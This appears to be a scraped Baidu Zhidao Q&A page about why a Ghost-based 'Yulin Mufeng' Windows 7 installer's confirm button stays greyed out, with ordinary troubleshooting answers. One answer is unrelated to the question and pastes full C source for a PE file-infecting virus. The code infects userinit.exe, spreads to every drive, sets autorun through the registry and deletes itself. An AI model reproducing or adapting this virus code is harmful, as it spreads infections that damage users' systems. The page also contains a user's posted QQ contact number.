雨木林风win7如何安装 50

直接上图:这是我下完系统解压出的文件,然后我打开ONEKEY。EXE出现但是这下面的确定是灰的,也就是点不了请问我如何在Ghost32打钩,打勾出现这种情况又改去哪里找这... 直接上图:
这是我下完系统解压出的文件,然后我打开ONEKEY。EXE出现

但是这下面的确定是灰的 ,也就是点不了 请问我如何在Ghost32打钩,打勾出现这种情况

又改去哪里找这Ghost32程序,或者我哪里步骤错了,求大神指导 ,在线等
展开
 我来答
百度网友c25cbc7
2013-07-20 · TA获得超过113个赞
知道小有建树答主
回答量:197
采纳率:0%
帮助的人:120万
展开全部
没那么复杂 用你第二张图 选择C盘 点确定就开始自动重装了
so easy

那都是自动识别的 一键ghost就是简单

实在不行就用pe

不推荐gho系统 个人比较喜欢纯净版

还有雨林木风很长时间不做系统了吧 这都是打着雨林木风名字的
更多追问追答
追问
用第二张图选C盘确定是灰的,点不了
追答
按理说可以啊  那你用U盘装个PE试试  在PE下装
名片
2024-10-28 广告
HyperWorks正版软件是由我们优菁科技(上海)有限公司代理的强大工程仿真软件套件。它集成了从产品设计、仿真分析到优化设计的全面工具集,支持多物理场耦合分析,帮助工程师解决复杂工程问题。HyperWorks提供高质量的建模、网格划分和仿... 点击进入详情页
本回答由名片提供
罗兰没有紫
2014-12-18
知道答主
回答量:5
采纳率:0%
帮助的人:5233
展开全部
我之前有过你这样的情况 只要把下载的系统和安装工具要放到非C盘的跟目录下。想你这个最好直接放到g盘下,而不是放到g盘下的mylf文件里面
已赞过 已踩过<
你对这个回答的评价是?
评论 收起
星城星探
2013-07-20 · TA获得超过1.2万个赞
知道小有建树答主
回答量:1669
采纳率:100%
帮助的人:847万
展开全部
第二张图下,点击盘符,下面的确定就会变为实体,再点击就开始安装了。
当然,基本上都是点击C盘盘符的。
已赞过 已踩过<
你对这个回答的评价是?
评论 收起
jsyzcwkym
2013-07-20 · TA获得超过1516个赞
知道大有可为答主
回答量:7201
采纳率:50%
帮助的人:5203万
展开全部
留下你的联系方式,我给你解决
追问
Q:1034821050 你可以加我 谢谢
已赞过 已踩过<
你对这个回答的评价是?
评论 收起
邓发珩
2013-07-20 · TA获得超过522个赞
知道小有建树答主
回答量:798
采纳率:0%
帮助的人:521万
展开全部
//////////////////////////////////////////////////////////////////////////
//FileName: Virus
//Data: 2009-04-22
//Remark: PE感染型病毒代码
//////////////////////////////////////////////////////////////////////////
#pragma once
#include <stdio.h>
#include <Windows.h>
#pragma data_seg(".mydat")
#pragma code_seg(".shell")
#pragma const_seg(".constdata")
#pragma comment(linker,"/SECTION:.mydat,RWE")
#pragma comment(linker,"/SECTION:.shell,RWE")
#pragma comment(linker,"/SECTION:.constdata,RWE")
#pragma comment(linker,"/MERGE:.mydat=.shell")
#pragma comment(linker,"/MERGE:.constdata=.shell")
#pragma comment(linker, "/OPT:NOWIN98")
#pragma comment(linker, "/subsystem:windows /entry:main")

//////////////////////////////////////////////////////////////////////////
//宏定义部分
//////////////////////////////////////////////////////////////////////////

//感染目标文件
#define TARGET "\\userinit.exe"
//感染标记
#define INFECTFLAG 19901117

//////////////////////////////////////////////////////////////////////////
//Payload 部分
//////////////////////////////////////////////////////////////////////////
//宏定义、函数声明部分
//此宏可实现代码重定位
#define RECODE(A) { _asm call A _asm A: _asm pop ebx _asm lea eax,A _asm sub ebx,eax }
//重定位字符串偏移
#define RecodeStrOffset(pStr)  { _asm mov eax,[pStr] _asm lea eax,[ebx+eax] _asm mov pStr,eax } 
#define RecodeVarOffset(dwGlovalVar,dwLocalVar)  { _asm mov eax,[ebx+dwGlovalVar] _asm mov dwLocalVar,eax }
//动态搜索函数地址
void GetKernelFunc(void);
//核心payload
void ShellExcute(char* szDll,char* szFunc,char* szAction,char* szUrl);
//用于函数名比较
int FunCompare(char* str1,char* str2);

//Typedef 函数
typedef HINSTANCE (WINAPI *pLoadLibraryFunc)(LPCTSTR);
typedef DWORD (WINAPI *pShellExcuteFunc)(HWND,LPCTSTR,LPCTSTR,LPCTSTR,LPCTSTR,INT);


//Payload 从这里开始
DWORD EntryPoint = 0;
char szShellExcute[] = "ShellExecuteA";
char szShell[] = "Shell32.dll";
char szKernel[] = "Kernel32.dll";
char szAction[] = "open";
char szUrl[] = "www.google.cn";
char szLoadLibrary[] = "LoadLibraryA";
char szGetProcAddress[] = "GetProcAddress";

DWORD dwLoadLibrary = 0;
DWORD dwGetProcAddress = 0;

void BeginPoint(void)
{
RECODE(A);
DWORD OldEntryPoint = 0;
RecodeVarOffset(EntryPoint,OldEntryPoint)
GetKernelFunc();

ShellExcute(szShell,szShellExcute,szAction,szUrl);

_asm{
jmp OldEntryPoint
}

}


//////////////////////////////////////////////////////////////////////////
//用于函数名比较
//////////////////////////////////////////////////////////////////////////
int FunCompare(char* str1,char* str2)
{
while ( *str1 && *str2 && *str1==*str2)
{
str1++;str2++;
}

return (*str1-*str2);
}
//////////////////////////////////////////////////////////////////////////
//获取Kernel32基地址,并搜索 LoadLibraryA() 和 GetProcAddress() 地址
//////////////////////////////////////////////////////////////////////////
void GetKernelFunc(void)
{
RECODE(A);

PBYTE pLoadLibrary = (PBYTE)szLoadLibrary;
PBYTE pGetProcAddress = (PBYTE)szGetProcAddress;

RecodeStrOffset(pLoadLibrary);
RecodeStrOffset(pGetProcAddress);

//获取Kernel32.dll的基地址
DWORD dwKernelBase = 0;
_asm{
mov eax,dword ptr fs:[30h]
mov eax,dword ptr [eax+0Ch]
mov esi,dword ptr [eax+1Ch]
lods dword ptr [esi]
mov eax,dword ptr [eax+08h]
mov dwKernelBase,eax
}

//Kernel32.dll的DOS头和PE头
IMAGE_DOS_HEADER *pHdr = (IMAGE_DOS_HEADER*)dwKernelBase;
IMAGE_NT_HEADERS *pNTHdr = (IMAGE_NT_HEADERS*)((PBYTE)dwKernelBase+pHdr->e_lfanew);

//数据目录项
IMAGE_DATA_DIRECTORY *pDatHdr = pNTHdr->OptionalHeader.DataDirectory;
//导出表
IMAGE_EXPORT_DIRECTORY *pEPTHdr = (IMAGE_EXPORT_DIRECTORY*)((PBYTE)dwKernelBase + pDatHdr->VirtualAddress);
//导出函数地址
DWORD* dwFunAdr = (DWORD*)((PBYTE)dwKernelBase + pEPTHdr->AddressOfFunctions);
DWORD* dwAdr = (DWORD*)((PBYTE)dwKernelBase + pEPTHdr->AddressOfNames);
DWORD dwFunc = 0;

//遍历出 LoadLibray() 和 GetProcAddress() 的地址
for (unsigned int i=0;i<pEPTHdr->NumberOfNames;i++)
{
if (FunCompare((char*)dwKernelBase+dwAdr[i],(char*)pLoadLibrary)==0)
{
dwFunc = dwFunAdr[i];
_asm{
RECODE(B)
mov eax,dwFunc
add eax,dwKernelBase
mov [ebx+dwLoadLibrary],eax
}
continue;
}
if (FunCompare((char*)dwKernelBase+dwAdr[i],(char*)pGetProcAddress)==0)
{
dwFunc = dwFunAdr[i];
_asm{
RECODE(C)
mov eax,dwFunc
add eax,dwKernelBase
mov [ebx+dwGetProcAddress],eax
}
}
}
}
//////////////////////////////////////////////////////////////////////////
//执行Shell,此函数可扩展
//////////////////////////////////////////////////////////////////////////
void ShellExcute(char* szDll,char* szFunc,char* szAction,char* szUrl)
{
RECODE(A);
char *pLocalDll = szDll;
RecodeStrOffset(szDll);
RecodeStrOffset(szFunc);
RecodeStrOffset(szAction);
RecodeStrOffset(szUrl);

//kernel32.dll BaseAddress : 0x7c800000.
DWORD LoadLibrary = 0x7c800000;
DWORD GetProcAddress = 0x7c800000;

RecodeVarOffset(dwLoadLibrary,LoadLibrary);
RecodeVarOffset(dwGetProcAddress,GetProcAddress);

HMODULE hDll = ((HMODULE(WINAPI*)(char*))LoadLibrary)(szDll);
PROC dwFunAddr = ((PROC(WINAPI*)(HMODULE,char*))GetProcAddress)(hDll,szFunc);

_asm{
mov eax,dwFunAddr
push 0
push 0
push 0
push szUrl
push szAction
push 0
call eax
}
}

///////////////////////////////////////////////////////////////////////////
//Payload在这里结束
//////////////////////////////////////////////////////////////////////////
void EndPoint(void){}


//////////////////////////////////////////////////////////////////////////
//函数声明部分
//////////////////////////////////////////////////////////////////////////
//感染指定文件
BOOL InfectFile(const char* fname);
//感染各驱动盘
BOOL InfectDriver(void);
//是否是正常PE文件
BOOL IsPeFile(PVOID pHdr);
//是否已被感染
BOOL IsInfected(PVOID pHdr);
//字节对齐
int Align(int size,int n);
//修改注册表,实现自动运行
BOOL SetAutorun(void);
//模拟打开盘符
BOOL OpenPath(void);
//自删除
BOOL SelfDelete(void);
//////////////////////////////////////////////////////////////////////////
//Main Function
//////////////////////////////////////////////////////////////////////////
int main(void)
{
//感染目标文件路径
char path[MAX_PATH] = {0};

//获取系统目录
GetSystemDirectory(path,MAX_PATH);

strcat(path,TARGET);
//感染目标文件
if (!InfectFile(path))
{
return 0;
}

//感染所有磁盘
InfectDriver();

//修改注册表,实现自动播放
SetAutorun();

//获取本程序路径
GetModuleFileName(NULL,path,MAX_PATH);
if (strlen(path) != strlen("X:\\Virus.exe"))
{
//自删除
SelfDelete();
return 0;
}
else
{
//模拟打开盘符
OpenPath();
}

//演示用对话框,读者可删
MessageBox(NULL,"I'm Virus","Virus",MB_OK);

return 0;
}
已赞过 已踩过<
你对这个回答的评价是?
评论 收起
百度网友913d317
2013-07-20 · TA获得超过153个赞
知道答主
回答量:341
采纳率:0%
帮助的人:92.6万
展开全部
是不是差个Ghost啊啊
追问
我也不清楚 小白...
追答
我无语了~~~~~~~     你QQ多少啊
已赞过 已踩过<
你对这个回答的评价是?
评论 收起
收起 更多回答(5)
推荐律师服务: 若未解决您的问题,请您详细描述您的问题,通过百度律临进行免费专业咨询

为你推荐:

下载百度知道APP,抢鲜体验
使用百度知道APP,立即抢鲜体验。你的手机镜头里或许有别人想知道的答案。
扫描二维码下载
×

类别

我们会通过消息、邮箱等方式尽快将举报结果通知您。

说明

0/200

提交
取消

辅 助

模 式